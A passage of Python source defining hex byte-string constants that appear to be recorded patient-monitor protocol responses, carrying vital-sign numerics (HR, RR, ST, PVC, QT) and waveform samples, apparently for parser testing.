b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_3_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_3_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_3_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x7f\xf0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x01\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xad\x20\x75\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x81\x21\xa1" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7" rsp_wave_3_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x7f\xf8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x06\x20\x08\x20\x0b\x20\x0e\x20\x10\x20\x13\x20\x17" \ b"\x20\x18\x20\x1a\x20\x1d\x20\x20\x20\x23\x20\x25\x20\x28\x20\x2b" \ b"\x20\x2e\x20\x31\x20\x33\x20\x30\x20\x30\x20\x2d\x20\x2a\x20\x28" \ b"\x20\x26\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x01\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x15\x20\x1d\x20\x23\x20\x29\x20\x31\x20\x37\x20\x3d" \ b"\x20\x45\x20\x4d\x20\x53\x20\x59\x20\x5f\x20\x67\x20\x6d\x20\x73" \ b"\x20\x79\x20\x7b\x20\x77\x20\x75\x20\x6d\x20\x67\x20\x61\x20\x59" \ b"\x20\x51\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_wave_3_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\x60\x00\x04\x00\x07\x03\x5a\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\x50\x00\x03\x00\x02\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x36\x00\x00\x00\x03" \ b"\x03\x30\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8" \ b"\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2" \ b"\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc" \ b"\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfa\x1f\xf9\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5" \ b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5" \ b"\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf9\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc" \ b"\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5" \ 